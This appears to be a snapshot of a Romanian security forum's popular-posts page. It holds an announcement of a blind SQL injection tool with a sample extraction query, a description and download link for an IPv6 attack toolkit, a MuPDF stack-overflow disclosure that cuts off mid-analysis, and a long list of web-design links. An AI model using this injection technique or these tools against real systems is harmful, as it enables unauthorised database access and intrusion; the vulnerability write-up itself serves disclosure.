Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 01/28/14 in all areas

  1. dancezar
    Scopul acestui programel este sa faca Blind Based sql injection. Cerinte minime: -Windows xp (testat pe windows 7) -Winsock.ocx Caracteristici: -Pentru fiecare litera de ghicit se foloseste cate un socket separat -Ca default ghiceste fiecare litera folosind codul ascii al fiecarui caracter cuprins intre 32 si 122 -Se poate defini un dictionar de catre utilizator bifind acea casuta -Se pot scoate variabile gen @@version, database() etc... sau selectii sub forma aceasta (select table_name from information_schema.tables where table_schema=database() limit 0,1) Casuta keyword se completeaza cu un cuvant care apare in sursa daca injectia este TRUE si dispare in momentul cand injectia este FALSE mai exact cuvantul cheie este un cuvant care face diferenta intre o injectie true sau false. Screenshot: Programul este aici: <sarcasm>Nu postez scan report de pe virus total ca sa va infectez pe toti muhahah</sarcasm> Sursa scrisa in anticul VB6: Zippyshare.com - blind.rar Si un demo frate: Pe viitor am sa aduc urmatoarele inbunatatiri: -Am sa adaug POST injection -Am sa mai imbunatatesc protocolul HTTP la unele da bad request -Injectiile vor veni cu WAF bypass ca default spatiile %20 vor fi inlocuite cu %0a -Inject_here option -Am sa incerc sa fac un prototip de timebased injection Pentru buguri contactati-ma pe PM. -Reparat bugul cu sursa de sub 8000 de caractere
    1 point
  2. Vlachs
    Color Scheme Generator http://wellstyled.com/tools/colorscheme2/index-en.html Color Blender Tool http://www.meyerweb.com/eric/tools/color-blend/ Top Color Combinations Graphic Design Tutorials : Graphic Design Software Directory & Portal for Graphics Tips : Desktop Publishing Resources & Graphic Design Links Kuler http://kuler.adobe.com/ Color Contrast Tool Colour Check - Etre Visibone’s Color Lab VisiBone Webmaster's Color Lab I like Your Colors Tool http://www.redalt.com/Tools/ilyc.php Pantone and Hexidecimal Colour Chart http://www.unimelb.edu.au/webcentre/tools/developertools/pantone.html Advanced Javascript Color Picker http://www.softpedia.com/get/Internet/WEB-Design/Web-Design-related/Advanced-Javascript-color-picker.shtml Color Combinations Color combinations - Cure for designers block Color Combo http://www.colorcombo.com/ Color Combos Color Combinations | Color Schemes | Color Palettes Color Library http://www.colorcombos.com/combolibrary.html Color Schemer http://www.colorschemer.com/online.html Web Color Schemes http://www.returnofdesign.com/colors/ Color Lovours http://www.colourlovers.com/ Lynda Weinman’s Browser-Safe Colors Organized By Hue http://www.websitetips.com/designer/colors1.html Lynda Weinman’s Website Tips For Designers: Browser-Safe Colors Organized By Value (Lights and Darks) Web Design, Development Resources - HTML Tutorials, CSS, Web Design Articles, Web Page Design, Web Design Tips, Fonts, Articles, Tutorials, HTML - Web Site Resources, Website Tips - WebsiteTips.com Visibone’s Swatch Collections http://www.visibone.com/swatches/ WEB DESIGN RESOURCES DIRECTORY http://www.allgraphicdesign.com/ Graphic Design Resources http://www.allwebdesignresources.com// Web Design Resources http://www.a2zwebdesignsource.com/ A2Z Web Design Resources http://www.bestcatalog.net/ Best Catalog http://www.hooverwebdesign.com/resources/ Hoover Web Design http://www.webmasteredge.com/ Webmaster Edge WEB DESIGN / GRAPHIC DESIGN FORUMS http://www.allgraphicdesign.com/phpBB2/ Graphic Design Forums http://www.openwebdesign.org/forum/ Open Web Design Forum http://www.webmasterworld.com/ WebmasterWorld http://www.webdevforums.com/ Web Dev Forum http://www.webdesignforum.com/ Web Design Forum http://webdesignforums.net/ Web Design Forums http://www.graphicdesignforum.com/ Graphic Design Forum http://www.graphic-design-forum.com/ Graphic-Design-Forum http://www.steeldolphin-forums.com/ Steel Dolphin Forum FREE TEMPLATES SITES AND DESIGN http://mashable.com/2007/09/29/2-column-website-templates/ 80 Free 2 Column Templates – Mashable http://mashable.com/2007/09/13/one-column-website-templates/ 40 Free 1 Column Templates – Mashable http://mashable.com/2007/10/11/free-3-column-web-templates/ 30 Free 3 Column Templates – Mashable http://www.101webtemplate.com/ 101WebTemplates http://www.adesdesign.net/php/templates.php Ades Design http://gerlinda.com/templates.shtml All-in-one Website Templates and hosting packages http://templates.arcsin.se/ CSS Design Templates http://www.designload.net/ Design Load http://www.htmlcenter.com/tutorials/tutorials.cfm/64 Dreamweaver Templates Tutorial http://www.elated.com/pagekits/ Elated Web Page Kits (Templates) http://mitchbryson.com/css-templates/ Free Basic CSS Templates http://www.freelayouts.com/ Free Layouts http://freesitetemplates.com/ Free Site Templates http://www.templatemuseum.com/ Free Templates & Web Designing http://www.freewebtemplates.com/ Free Web Templates http://www.freewebsitetemplates.com/ Free Web Site Templates http://www.graphic-templates.com/ Graphic Templates http://web.thenetter.com/ TheNetter.com Web Design http://www.mycelly.com/ MyCelly Free CSS Templates http://myfreetemplatehome.com/ My Free Template Home http://www.opendesigns.org/ Open Design Community http://www.oswd.org/ Opensource Web Design Templates http://www.opensourcetemplates.org/ Opensource Templates http://www.smartwebby.com/website_templates/default.asp Professional Dreamweaver Templates http://www.studio7designs.com/open_source_templates.cfm Studio 7 Opensource Templates http://www.templatehunter.com/ Template Hunter http://www.templatesbox.com/ Templates Box http://templates2go.com/ Templates to Go http://www.templateyes.com/ Template Eyes http://www.templates-themes-graphics.com/ Templates Theme Graphics http://www.templatemonster.com/ Template Monster http://www.templateworld.com/free_templates.html Template World http://www.webpagedesign.com.au/ Web Page Design Templates AU http://www.zeroweb.org/ Zero Web WEB DESIGN INSPIRATIONAL SITES http://brandsoftheworld.com/ Brands of the World http://www.dotcomlogotypes.com/main/main.php Dot Com Logotypes http://www.123-logo-logos.com/logo-designs.htm How to Design a Logo http://logotypes.designer.am/ Free LogoTypes http://www.goodlogo.com/ Good Logo http://gopromos.com/idea_center/stock_art_alpha.asp Go Promos http://www.logoed.fsnet.co.uk/index2.html Logoed http://www.ideabook.com/progress.htm Logo in Process http://logomarket.com/ Logomarket.com http://www.logotypes.ru/ Logotypes Russia http://www.basa.md/logo/ LogoTypes from Maldolva http://www.logotypes.lv/ Logotypes http://www.satlogo.com/ Satlogo.com http://www.sportlogo.net/ Sport Logos WEB SITE RATINGS & INFORMATION http://www.alexa.com/ Alexa http://blogoscoped.com/rank/ Any Rank http://blogoscoped.com/archive/2005-01-29-n34.html Blogoscoped http://www.golexa.com/ GoLexa Google Toolbar for Firefox – Google Toolbar Google Toolbar http://greatdb.com/ GreatDB http://www.rankquest.com/download-toolbar.html RankQuest Toolbar http://www.seo-browser.com/ SEO Browser http://tools.seobook.com/firefox/seo-for-firefox.html SEO Open for Firefox http://tools.seobook.com/firefox/seo-for-firefox.html SEO Toolbar for Firefox http://www.seotoolset.com/tools/toolbar.html SEO Toolbar http://www.wmtips.com/tools/info/ Site Information http://www.toolbarbrowser.com/ Toolbar Browser http://www.urltrends.com/ URL Trends http://www.websitegrader.com/ WebSite Grader KEYWORDS TOOLS FOR SEO http://www.goodkeywords.com/ Good Keywords https://adwords.google.com/select/KeywordToolExternal Google Adwords Keyword External Tool Google Trends Google Trends http://freekeywords.wordtracker.com/ Free Keyword Suggestion Tool http://www.keyworddiscovery.com/ Keyword Discovery http://www.digitalpoint.com/tools/suggestion/ Digital Point Keyword Suggestion Tool http://developers.evrsoft.com/seotool/ SEO Keyword Optimization Tool http://www.wordze.com/ Wordze SEARCH ENGINE OPTIMIZATION / SEO SITES http://www.thirtydaychallenge.com/ 30 Day Challenge http://www.seocompany.ca/tool/seo-tools.html 136 SEO Tools http://www.robotstxt.org/wc/active/html/ Database of Web Robots http://www.modernlifeisrubbish.co.uk/article/click-survey-heatmap-analysis Click Survey Analysis & Heatmap http://www.vaughns-1-pagers.com/internet/google-ranking-factors.htm Google Ranking Factors http://www.jimwestergren.com/link-bait/ Link Bait http://www.mattcutts.com/blog/ Matt Cutts http://www.highrankings.com/forum/ Search Engine Optimization Forum http://searchenginewatch.com/ Search Engine Watch http://www.seobook.com/ SEO Book http://www.seoegghead.com/blog/seo/mattcuttsarama-a-summary-of-useful-stuff-matt-cutts-has-said-p112.html SEO Egghead http://www.seomoz.org/ SEOMoz http://www.seroundtable.com/ SEO Roundtable http://www.webmasterworld.com/ Webmasters World WEB DESIGN INSPIRATION AND WEB DESIGN IDEAS http://www.thebestdesigns.com/ Best Designs http://www.brainfuel.tv/ Brain Fuel http://www.coolestdesigns.com/ Coolest Designs http://www.coolhomepages.com/ Cool Home Pages http://www.digitalrefueler.com/ Digital Refueler http://www.digitalthread.com/vintage/ Digital Thread http://www.thedreamer.com.br/ Dreamer http://www.internettinyawards.com/ Internet TINY Awards http://www.misspato.com/ Misspato http://www.moluv.com/ Moluv http://www.newstoday.com/ Newstoday http://nofound.com/home/ No Found http://www.nolimitmedia.com/ No Limit Media http://www.plasticpilots.com/ Plastic Pilots http://www.visualdesigner.net/home/ Visual Designer FREELANCE WEB DESIGN JOBS http://www.allfreelancework.com/ All Freelance Work (non bidding jobboard so cuts down on foreign competition) http://www.contractedwork.com/ Contracted Work http://www.elance.com/ Elance http://www.12freelance.com/ 12Freelance http://gigs.37signals.com/ 37 Signals http://www.agaveblue.net/ Agave Blue http://www.aquent.com/ Aquent (recruiting agency for freelancers) http://www.adveres.com/ Adveres http://authenticjobs.com/ Authenic Jobs http://www.bid-job.com/ Bid-Job http://www.bidradar.com/ Bid Radar http://www.careerbuds.com/ CareerBuds http://www.craigslist.org/ CraigsList http://www.ework.com/ eWork http://www.facebook.com/ FaceBook http://www.freelanceauctionnetwork.com/ Freelance Auction Network http://www.freelancebank.com/ Freelance Bank http://www.freelancebbs.com/ Freelance BBS http://www.freelancecenter.com/ Freelance Center http://www.freelancers.net/ Freelancers.net http://www.thefreelancehub.com/ Freelance Hub http://www.freelancejobsearch.com/ Freelance Job Search http://www.freelancejobs.org/ FreelanceJobs.Org http://www.freelancejobspost.com/ Freelance Jobs Post http://www.freelance-work.net/ Freelance-Work http://www.freelance.com/ Freelance.com http://www.freelancegroups.com/ Freelance Groups (For Christians) http://www.freelancemom.com/gigs.htm Freelance Mom http://www.freelanceireland.ie/ Freelance Ireland http://www.freelanceindia.com/ Freelance India http://www.freelancequotes.com/ Freelance Quotes http://www.freelanceq.com/ FreelanceQ http://jobsandgigs.com/ Jobs and Gigs http://www.linkedin.com/ LinkedIn http://www.noagenciesplease.com/ No Agencies Please http://www.odesk.com/ ODesk http://www.project4hire.com/ Project4Hire http://www.smarterwork.com/ Smarterwork http://www.sologig.com/ SoloGig http://www.thecentralmall.com/index.html The Central Mall http://www.totalfreelance.com/ Total Freelance http://www.trally.com/ Trally (translation jobs) http://www.woompa.com/ Woompa http://www.workatnight.com/ Work at Night WEB DESIGN SPECIFIC FREELANCE SITES http://cgilance.com/main.html CGI Lance http://www.cityitjobs.net/ City IT Jobs http://www.codelance.com/ Code Lance http://www.coderforrent.com/ Coder for Rent http://www.coroflot.com/ Coroflot (Designers) http://www.coswap.com/ Creative Freelance Web Designer Marketplace http://www.designquote.net/ Design Quote: Where web designers and web design projects meets. http://www.developreneurs.com/ Developreneurs http://www.developerbids.com/ Developer Bids http://www.devbistro.com/ Dev Bistro http://www.e-globalsolutions.com/ e-Global Solutions http://www.freelanceauction.com/ Freelance Auction http://www.freelancecentral.net/ Freelance Central http://www.freelancedesigners.com/ Freelance Designers http://www.freelancewebprojects.com/ Freelance Web Projects http://freelanceseek.com/ Freelance Seek http://jobs.freelanceswitch.com/ Freelance Switch http://devbistro.com/index.jsp Freelance Web Developer http://www.freelancewebprogramming.com/ Freelance Web Programming http://www.freshwebjobs.com/ Fresh Web Jobs http://jobs.gawker.com/newmediajobs Gawker Internet / New Media Jobs http://www.geekbidder.com/ Geek Bidder http://www.getafreelancer.com/ Get a Freelancer http://www.gurulance.com/ GuruLance http://www.hirecoders.com/ Hire Coders http://www.artypapers.com/jobpile/ Job Pile http://www.krop.com/ Krop (creative and tech jobs) http://www.listbid.com/ List Bid http://www.nyfreelancers.com/ NY Freelancers http://www.outsourcetoday.net/ Outsource Today http://www.oslance.com/ OsLance http://www.php-freelancers.com/ PHP Freelancers http://www.phpquote.net/ PHP Quote http://www.planetrecruit.com/ Planet Recruit http://www.projectspool.com/ Project Pool http://www.projectspring.com/freelance/index.html ProjectSpring http://rfq.programmingbids.com/ Programming Bids http://www.programmingoutpost.com/ Programming Outpost http://www.project4hire.com/ Project4Hire http://www.projectsimple.com/ Project Simple http://www.freelancefree.com/ Freelance Free http://r144.com/workshop.htm Freelance Job News http://www.freelanceyourproject.com/ Freelance Your Project http://www.guru.com/ Guru.com http://www.hirebid.com/ HireBid http://www.ifreelance.com/ iFreelance http://www.joomlafreelance.co.uk/ Joomla Jobs http://www.joomlancers.com/ Joomlancers http://www.lancesite.com/ Lance Site http://ct.monster.com/ Monster (Monster has a Contract and Temporary Work section) http://www.noagenciesplease.com/ No Agencies Please http://www.freelancedirectory.org/ NUJ Freelance Direct http://www.projectlance.com/ ProjectLance http://www.prosavvy.com/ ProSavvy http://www.rentacoder.com/RentACoder/default.asp Rentacoder http://www.scriptalliance.com/ Script Alliance http://www.scripthelpers.com/ Script Helpers http://www.scriptplaza.com/ Script Plaza http://www.snaplance.com/ SnapLance http://www.sologig.com/ Sologig http://www.supportuniverse.com/ Support Universe http://www.templatelance.com/ TemplateLance http://www.webprojobs.com/ Web Pro Jobs http://www.webwalas.com/ Web Walas FREE STOCK PHOTOGRAPHY SITES http://www.amgmedia.com/freephotos/ AMG Media http://www.artfavor.com/ Art Favor http://www.ars.usda.gov/is/graphics/photos/ ARS Image Gallery http://amazingtextures.com/textures/index.php Amazing Textures http://www.burningwell.org/ Burning Well http://www.bigfoto.com/ Big Foto http://www.buzznet.com/ Buzz Net http://www.barrysfreephotos.com/ Barry’s Free Photos – Free Stock Photos http://www.creatingonline.com/stock_photos/ Creating Online http://www.cepolina.com/freephoto/ Cepolina http://search.creativecommons.org/ Creative Commons Search http://gimp-savvy.com/PHOTO-ARCHIVE/ Copyright Free Photo Archive http://gallery.hd.org/index.jsp DHD Multimedia Gallery http://www.free-photographs.net/ Free Photographs http://www.freedigitalphotos.net/ Free Digital Photos http://www.freeimages.co.uk/ Free Images and Stock Photos http://www.freephotos.com/ Free Photos Dot Com http://www.freephotosbank.com/ Free Photos Bank http://free-stockphotos.com/ Free Stock Photos Dot Com http://www.freemediagoo.com/ Free Media Goo http://geekphilosopher.com/MainPage/photos.htm GeekPhilosopher http://freestockphotos.com/ Free Stock Photos http://www.freefoto.com/index.jsp Free Foto http://fromoldbooks.org/ From Old Books http://www.holylandphotos.org/ Holy Land Photos http://davidniblack.com/imagebase/ Image Base http://www.imageafter.com/ Image After http://build.tripod.lycos.com/imagebrowser/photos/index.html Lycos Image Gallery http://www.morguefile.com/ Morgue File http://majesticimagery.com/ Majestic Imagery http://www.pics4learning.com/ Pics4Learning http://www.pixelperfectdigital.com/ Pixel Perfect Digital http://pdphoto.org/ PD Photo http://www.photorogue.com/ Photo Rogue http://www.pixelbag.de/ PixelBag http://www.photocase.com/ PhotoCase http://www.picturestation.net/start/ Picture Station http://www.piotrpix.info/ Piotr.Pix http://www.sxc.hu/ Stock Xchng http://www.stockvault.net/ Stock Vault http://www.unprofound.com/ UnProfound http://www.visipix.com/index_hidden.htm Visipix http://www.woophy.com/ Woophy http://www.nps.gov/yell/press/images/ Yellowstone National Park http://yotophoto.com/ YotoPhoto http://www.nwyhstockimages.com/ NWYH Stock Image Library http://www.openphoto.net/ Open Photo http://stockcache.com/gallery/ Stockcache Gallery http://www.vintagepixels.com/ Vintage Pixels http://commons.wikimedia.org/ Wikimedia http://wallpaperstock.com/ Wallpaper Stock PORTFOLIO SITES http://www.allfreelancework.com/ AllFreelanceWork.com http://altpick.com/ AltPick.com http://www.deviantart.com/ DeviantArt http://www.graphicdesigncommunity.com/ Graphic Design Community http://www.portfolios.com/ Portfolios.com DESIGN MAGAZINES http://www.arkitip.com/ Arkitip http://www.pagelab.com/ Before & After http://www.digital-web.com/ Digital Web http://www.bigmagazine.com/home.htm Big Magazine http://coupe-mag.com/ Coupe Mag http://www.digitaloutput.net/ Digital Output http://www.graphis.com/ Graphis http://www.alistapart.com/ A List Apart http://www.pagelab.com/ Before & After http://www.bornmag.com/ Born Magazine http://www.brigataitalia.com/ Brigata http://www.creativebehavior.com/ Creative Behavior http://www.creativebusiness.com/newsletter.lasso Creative Business Newsletter http://www.delvemagazine.com/ Delve Magazine http://www.digitaloutput.net/ Digital Output http://digitalproducer.digitalmedianet.com/ Digital Producer Magazine http://venturalady.com/html/vuepoint.html VUEPOINT Magazine (On Amazon.com) Titles .net : The Internet Magazine Inside Web Design How Magazine Communication Arts Dynamic Graphics Magazine Layers Magazine Computer Arts C-W Computer Arts Projects Computer Graphics World Digital Arts Magazine Eye – International Review of Graphic Design Step Inside Design Magazine Graphic Communications World Graphic Design – USA Graphic Design Journal I.D. Magazine Novum : World of Graphic Design Digital Graphics Magazine Graphic Arts Monthly Magazine Grafik Professional Magazine Inside Adobe Indesign Magazine / Journal Trade Pub Digital Media World Advanced Photoshop Inside Photoshop Magazine Photoshop Creative Magazine Photoshop Elements Techniques Magazine Better Photoshop Techniques Magazine Grafik Student Magazine DESIGN MAGAZINES ONLINE http://www.gxo.com/ Graphic Exchange http://www.graphis.com/ Graphis http://www.netdiver.net/ Net Diver http://www.fontsite.com/ FontSite http://www.pingmag.jp/ Pink Mag http://www.guuui.com/ GUUUI FREE FONTS SITES http://new.myfonts.com/WhatTheFont/ WhatTheFont http://www.1001freefonts.com/ 1001 Free Fonts http://www.1001fonts.com/ 1001 Fonts http://www.2200freefonts.com/ 2200 Free Fonts http://www.1archive.com/ 1 Archive Fonts http://www.4yeo.com/freefonts/index.htm 4Yeo http://www.a1fonts.com/html/Letter_A,0.htm A1 Fonts http://desktoppub.about.com/od/freefonts/ About.com Free Fonts http://www.abstractfonts.com/ Abstract Fonts http://www.abcwebworx.com/fonts/ ABCWebWorx http://www.grsites.com/fonts/ Absolute Fonts Archive http://www.graphicsngraphicdesign.com/hugelistfreefontssites Huge list of free fonts here…. TUTORIALS SITES http://www.tutorialselect.com/ Tutorials Select http://www.pixel2life.com/ Pixel2Life http://www.goodtutorials.com/ Good Tutorials http://www.totaltutorial.com/ Total Tutorials http://www.tutorialoutpost.com Tutorial Outpost http://www.tutorialquest.com/ Tutorial Quest http://www.w3schools.com/ W3 Schools BLOG HOSTS AND SERVICES https://www.blogger.com/start Blogger http://www.livejournal.com/ LiveJournal http://multiply.com/ Multiply http://www.opendiary.com/ Open Diary http://www.squidoo.com/ Squidoo http://www.tumblr.com/ Tumblr http://twitter.com/ Twitter http://www.typepad.com/ TypePad http://wordpress.com/ WordPress COMMUNITY / CMS SOFTWARE http://www.drupal.org/ Drupal http://elgg.org/ Elgg http://www.joomla.org/ Joomla http://www.mamboserver.com/ Mambo http://radiantcms.org/ Radiant CMS http://typo3.org/ Typo 3 http://www.boonex.com/products/dolphin/ Boonex Dolphin FORUM / MESSAGE BOARD SOFTWARE http://www.phpbb.com/ PHPBB http://www.invisionpower.com/ Invision Power http://www.simplemachines.org/ Simple Machines http://forum.snitz.com/default.asp Snitz http://www.phorum.org/ Phorum http://www.punbb.org/ PunBB http://www.webwizguide.info/web_wiz_forums/default.asp WebWiz http://www.wowbb.com/ WowBB http://www.ubbcentral.com/ UBB http://getvanilla.com/ Vanilla http://www.vbulletin.com/ VBulletin WEB DESIGN BLOGS http://www.allwebdesignresources.com/webdesignblogs/ Web Design Resources Blog http://www.456bereastreet.com/ 456 Berea Street http://www.andybudd.com/ Andy Budd http://www.alistapart.com/ A List Apart http://andreasviklund.com/ Andreas Vilkund http://www.bartelme.at/journal/ Bartelme Design http://bittbox.com/ Bitt Box http://www.briangardner.com/ Brian Gardner http://www.cssbeauty.com/ CSS Beauty http://fadtastic.net/ Fadtastic http://www.allgraphicdesign.com/graphicsblog/ Graphic Design & Graphics News Blog http://meyerweb.com/ Meyer Web http://www.pearsonified.com/ Pearsonified http://www.snook.ca/jonathan/ Snook http://www.simplebits.com/ Simple Bits http://www.sitepoint.com/blogs/category/design/ SitePoint http://www.smashingmagazine.com/ Smashing Magazine http://theundersigned.net/ Undersigned http://www.thinkvitamin.com/ Vitamin http://warpspire.com/ Warpspire http://www.webdesignerwall.com/ Web Designer Wall WEB HOSTING REVIEWS AND DIRECTORIES http://www.filehostingreview.com/ File Hosting Review http://www.webhostingjury.com/ Web Hosting Jury http://www.webhostingunleashed.com/ Web Hosting Unleashed http://www.hostindex.com/web/hostexcellence/host_excellence_reviews.shtm Host Excellence http://www.reviewwebhosts.com/ Review Web Hosts http://www.powerreviews.com/ Power Reviews http://www.websitehostingreviews.com/ Web Site Hosting Reviews ADVERTISING https://www.google.com/adsense/ Google Adsense http://www.adbrite.com/ AdBrite http://www.adengage.com/ Adengage http://www.bidclix.com/ BidClix http://www.bidvertiser.com/ Bidvertiser http://www.clicksor.com/ Clicksor http://www.text-link-ads.com/ Commission Junction http://www.compactads.com/ Compact Ads http://www.interclick.com/ InterClick http://www.kontera.com/ Kontera http://kanoodle.com/ Kanoodle http://partnerweekly.com/ Partner Weekly http://www.peakclick.com/ PeakClick http://www.text-link-ads.com/ TextLinkAds http://www.valueclick.com/ ValueClick http://publisher.yahoo.com/ Yahoo Publisher WEB DESIGN / DEVELOPMENT LIBRARIES http://weblogs.asp.net/mschwarz/archive/2005/04/07/397504.aspx AJAX http://redredmusic.com/brendon/ajform/ AJForm http://www.ajaxgear.com/ Ajax Gear https://developer.berlios.de/projects/bajax/ Bajax http://bennolan.com/behaviour/ Behaviour http://www.colorcombos.com/combolibrary.html Color Combos http://cpaint.booleansystems.com/ CPaint http://www.cross-browser.com/toys/ Cross Browser Toys http://www.dhtmlgoodies.com/ DHTML Libraries http://www.dojotoolkit.org/ Dojo http://www.youngpup.net/2001/domdrag/ DOM Drag http://www.walterzorn.com/dragdrop/dragdrop_e.htm Drag and Drop http://www.dynamicdrive.com/style/ Dynamic Drive CSS Library http://www.imnmotion.com/projects/engine/ Engine http://www.walterzorn.com/jsgraphics/jsgraphics_e.htm Javascript Vector Graphics http://www.mochikit.com/ Mochikit http://moofx.mad4milk.net/ Moo.FX http://www.bosrup.com/web/overlib/ OverLib http://pear.php.net/ Pear http://www.plextk.org/ Plex Toolkit http://prototype.conio.net/ Prototype http://qooxdoo.oss.schlund.de/ Qooxdoo http://openrico.org/rico/home.page Rico http://twilightuniverse.com/projects/sack/ Sack http://sarissa.sourceforge.net/doc/ Sarissa http://script.aculo.us/ Script.aculo.us http://sourceforge.net/projects/solvent/ Solvent http://swat.silverorange.com/Swat Swat http://www.technicalpursuit.com/ajax.htm Tibet http://www.dotvoid.com/view.php?id=40 Toxic http://developer.yahoo.com/yui/ Yahoo UI Library http://www.zimbra.com/ Zimbra TOP CSS TOOLS blueprintcss - Blueprint: A CSS Framework - Google Project Hosting BluePrint CSS http://www.somacon.com/p334.php CSS Fonts and Text Library Tool http://www.dynamicdrive.com/style/ Dynamic Drive CSS Library http://www.cssdrive.com/index.php/main/csscompressor/ CSS Compression http://www.cssoptimiser.com/ CSS Optimizer http://csstidy.sourceforge.net/index.php CSS Tidy http://www.csscreator.com/version2/pagelayout.php CSS Creator http://riddle.pl/emcalc/ CSS Pixel Font Sizes Tool http://www.accessify.com/tools-and-wizards/accessibility-tools/form-builder/ CSS Accessible Form Builder Tool http://www.maketemplate.com/form/ CSS Form Code Maker http://www.neuroticweb.com/recursos/css-rounded-box/ CSS Rounded Box Generator http://www.collylogic.com/scripts/rollover.html CSS Rollover Generator http://typetester.maratz.com/ CSS Typetester http://www.sitevista.com/cssvista/ CSS Vista http://www.highdots.com/css-list/index.php HightDots Tabs CSS Generator http://www.redalt.com/Tools/ilyc.php I Like Your Colors from Redalt http://www.korhoen.net/css_typeviewer.html Korhoen CSS Typeviewer http://www.maketemplate.com/ Make Template CSS Tool http://www.accessify.com/tools-and-wizards/developer-tools/list-o-matic/ Navigational CSS Menu Generator http://www.positioniseverything.net/articles/pie-maker/pagemaker_form.php Position Is Everything http://www.iconico.com/CSSScrollbar/ Scrollbar Color Changer http://www.s5easy.com/ Slideshow Creator http://www.scriptomizers.com/css/stylesheet_generator Stylesheet Generator http://www.wannabegirl.org/firdamatic/ Tableless Layout Generator http://www.ibdjohn.com/csstemplate/ Template Code Generator Technorati Tags: http://technorati.com/tag/web+design+tools web design tools http://technorati.com/tag/design+tools design tools http://technorati.com/tag/web+design+resources web design resources http://technorati.com/tag/top+web+design+tools top web design tools http://technorati.com/tag/top+web+design+resources top web design resources http://technorati.com/tag/css css http://technorati.com/tag/colors colors http://technorati.com/tag/toolkit toolkit http://technorati.com/tag/tools tools http://technorati.com/tag/templates templates http://technorati.com/tag/free+templates free templates http://technorati.com/tag/css+tools css tools http://technorati.com/tag/color+pickers color pickers http://technorati.com/tag/color+choosers color choosers http://technorati.com/tag/css+resources css resources http://technorati.com/tag/web+design+forums web design forums http://technorati.com/tag/design+forums design forums http://technorati.com/tag/cms+software cms software http://technorati.com/tag/free+photos free photos http://technorati.com/tag/free+photographs free photographs http://technorati.com/tag/free+images free images http://technorati.com/tag/free+fonts free fonts http://technorati.com/tag/list+of+fonts list of fonts http://technorati.com/tag/inspiration+sites inspiration sites http://technorati.com/tag/web+design+inspiration web design inspiration http://technorati.com/tag/seo+tools seo tools http://technorati.com/tag/search+engine+optimization+tools search engine optimization tools http://technorati.com/tag/seo seo http://technorati.com/tag/search+engine+optimization search engine optimization http://technorati.com/tag/web+design+jobs web design jobs http://technorati.com/tag/job+sites job sites http://technorati.com/tag/freelance+job+sites freelance job sites http://technorati.com/tag/freelance+job+boards freelance job boards http://technorati.com/tag/portfolio+sites portfolio sites http://technorati.com/tag/free+portfolios free portfolios http://technorati.com/tag/stock+photograph stock photograph http://technorati.com/tag/blog+hosts blog hosts http://technorati.com/tag/blog+services blog services http://technorati.com/tag/server+review+sites server review sites http://technorati.com/tag/host+review+sites host review sites http://technorati.com/tag/web+design+directories web design directories http://technorati.com/tag/design+directories design directories
    1 point
  3. Versus71
    The SI6 Networks' IPv6 toolkit is a set of IPv6 security/trouble-shooting tools, that can send arbitrary IPv6-based packets. List of Tools: addr6: An IPv6 address analysis and manipulation tool. flow6: A tool to perform a security asseessment of the IPv6 Flow Label. frag6: A tool to perform IPv6 fragmentation-based attacks and to perform a security assessment of a number of fragmentation-related aspects. icmp6: A tool to perform attacks based on ICMPv6 error messages. jumbo6: A tool to assess potential flaws in the handling of IPv6 Jumbograms. na6: A tool to send arbitrary Neighbor Advertisement messages. ni6: A tool to send arbitrary ICMPv6 Node Information messages, and assess possible flaws in the processing of such packets. ns6: A tool to send arbitrary Neighbor Solicitation messages. ra6: A tool to send arbitrary Router Advertisement messages. rd6: A tool to send arbitrary ICMPv6 Redirect messages. rs6: A tool to send arbitrary Router Solicitation messages. scan6: An IPv6 address scanning tool. tcp6: A tool to send arbitrary TCP segments and perform a variety of TCP-based attacks. Download: http://www.si6networks.com/tools/ipv6toolkit/ipv6toolkit-v1.5.2.tar.gz
    1 point
  4. daatdraqq
    Orice putere te vrea prost ,supus,idiot,cuminte. Legile astea sunt date la intimidare .
    1 point
  5. net3design
    0day - MuPDF Stack-based Buffer Overflow in xps_parse_color() #### # Date of discovery: 2013-01-26 # Software Links: MuPDF ; MuPDF - Wikipedia, the free encyclopedia # Version: <= 1.3 # Author: Jean-Jamil Khalifé # Tested on: Windows XP SP3 (fr) / Windows 7 x64 (fr) # Home: HDW Sec - Accueil # Blog: http://www.hdwsec.fr/blog/ #### Disclosure Timeline 2014-01-16 MuPDF contacted 2014-01-18 fix integrated Introduction I was recently looking for an opensource cpp lightweight PDF and XPS viewer to play with and I found MuPDF. So I decided to have some fun during my free time and took a look at the source code of this product and quickly checked it out to verify if some vulnerabilities were present or not. After about two hours, I found a dos and a stack overflow. This second vulnerability finally led to a remote code execution when a user opens a malicious XPS document. Analysis When MuPDF loads the XPS document, it loads the first page and parses each element via xps_parse_element() as detailed in the XPS specification ( http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-388.pdf ), When the crash occurs, the call stack looks like this : mupdf.exe!xps_parse_path mupdf.exe!xps_parse_element mupdf.exe!xps_parse_fixed_page mupdf.exe!xps_run_page mupdf.exe!fz_run_page_contents mupdf.exe!pdfapp_loadpage void xps_parse_element(xps_document *doc, const fz_matrix *ctm, const fz_rect *area, char *base_uri, xps_resource *dict, fz_xml *node ) { …………. if (!strcmp(fz_xml_tag(node), "Path")) xps_parse_path(doc, ctm, base_uri, dict, node); if (!strcmp(fz_xml_tag(node), "Glyphs")) xps_parse_glyphs(doc, ctm, base_uri, dict, node); …………. } In this case, the Path element is parsed via the xps_parse_path() function which allows extraction of the attributes and extended attributes (Clip, Data, Fill, …). If some conditions are fulfilled, we can trigger a stack overflow in the xps_parse_color() function when it parses the value "ContextColor" of the attribute "Fill". void xps_parse_path(xps_document *doc, const fz_matrix *ctm, char *base_uri, xps_resource *dict, fz_xml *root) { fz_stroke_state *stroke = NULL; fz_matrix transform; float samples[32]; fz_colorspace *colorspace; fz_path *path; fz_path *stroke_path = NULL; fz_rect area; int fill_rule; int dash_len = 0; fz_matrix local_ctm; ……. fill_att = fz_xml_att(root, "Fill"); ……. if (fill_att) { xps_parse_color(doc, base_uri, fill_att, &colorspace, samples); if (fill_opacity_att) samples[0] *= fz_atof(fill_opacity_att); xps_set_color(doc, colorspace, samples); fz_fill_path(doc->dev, path, fill_rule == 0, &local_ctm, doc->colorspace, doc->color, doc->alpha); } ……. } This function is in charge of getting all the floating numbers of ContextColor and putting them into the samples[32] buffer. The issue is that it does it without controlling the size of this array. void xps_parse_color(xps_document *doc, char *base_uri, char *string, fz_colorspace **csp, float *samples) { …………. else if (strstr(string, "ContextColor ") == string) { fz_strlcpy(buf, string, sizeof buf); profile = strchr(buf, ' '); if (!profile) { fz_warn(doc->ctx, "cannot find icc profile uri in '%s'", string); return; } *profile++ = 0; p = strchr(profile, ' 